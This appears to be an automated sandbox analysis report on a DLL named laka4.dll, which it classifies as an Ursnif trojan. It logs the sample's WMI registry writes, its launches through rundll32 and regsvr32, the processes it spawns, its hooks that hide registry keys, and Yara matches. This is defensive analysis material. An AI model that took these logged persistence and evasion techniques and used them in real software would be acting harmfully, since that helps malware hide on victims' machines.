Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007D5408 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_007D5408
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007DB2E1 NtQueryVirtualMemory,	0_2_007DB2E1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F45408 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_00F45408
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F4B2E1 NtQueryVirtualMemory,	2_2_00F4B2E1

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007DA032	0_2_007DA032
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007DB0BC	0_2_007DB0BC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007D5B45	0_2_007D5B45
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007D73DB	0_2_007D73DB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F4B0BC	2_2_00F4B0BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F4A032	2_2_00F4A032
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F473DB	2_2_00F473DB

Source: laka4.dll

Binary or memory string: OriginalFilenamesmile.dll@ vs laka4.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: laka4.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 00000002.00000002.1030930479.00000000010B1000.00000004.00000001.sdmp, type: MEMORY

Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =

Source: classification engine

Classification label: mal100.troj.evad.winDLL@77/155@26/1

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_007D9E28 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

0_2_007D9E28

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{3BB1EF43-A871-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6712:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3080:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6136:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_01

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFC198BA407A93F7AA.TMP

Jump to behavior

Source: laka4.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\laka4.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\laka4.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\laka4.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\laka4.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\laka4.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\laka4.dll,Brightnight
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6952 CREDAT:17410 /prefetch:2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\laka4.dll,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\laka4.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\laka4.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\laka4.dll,Brightnight	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\laka4.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\laka4.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6952 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo 'Guess s'

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: laka4.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: laka4.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: laka4.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: laka4.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: laka4.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: laka4.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: laka4.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: c:\Floor help\sharp\Baby\Meas\smile.pdb source: laka4.dll

Source: laka4.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: laka4.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: laka4.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: laka4.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: laka4.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: laka4.dll

Static PE information: real checksum: 0x93768 should be: 0x9718f

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\laka4.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007DE41E push esp; ret	0_2_007DE420
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007DACF0 push ecx; ret	0_2_007DACF9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007DEAE5 push ds; retf	0_2_007DEAEB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007DB0AB push ecx; ret	0_2_007DB0BB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007DE163 push edx; iretd	0_2_007DE164
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007DE919 pushfd ; ret	0_2_007DE91A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007DE5D9 push eax; iretd	0_2_007DE5DA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F4ACF0 push ecx; ret	2_2_00F4ACF9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F4EAE5 push ds; retf	2_2_00F4EAEB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F4B0AB push ecx; ret	2_2_00F4B0BB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F4E41E push esp; ret	2_2_00F4E420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F4E5D9 push eax; iretd	2_2_00F4E5DA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F4E163 push edx; iretd	2_2_00F4E164
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00F4E919 pushfd ; ret	2_2_00F4E91A

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.838142140.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857625114.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909665638.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.959293774.00000000054AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905711954.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905674059.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857795473.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.938999366.00000000031BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857776316.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905782753.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905833677.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909829429.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857683077.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909904535.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857820386.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857808720.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838200660.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909762591.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857714581.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1009913837.000000000541C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838181374.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909865416.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909891092.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909848147.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838052469.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838002362.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905819560.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.909807581.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1013072792.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838240951.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.857756795.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.838099477.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905803436.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905753199.0000000005618000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.837840447.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.905845684.0000000005618000.00000004.00000040.sdmp, type: MEMORY

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000018.00000003.775701050.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.780693607.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.766624106.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.764888743.0000000002F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.763148290.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.3.loaddll32.exe.bda481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.2f4a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.rundll32.exe.311a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.f4a481.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.2e1a481.0.raw.unpack, type: UNPACKEDPE

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

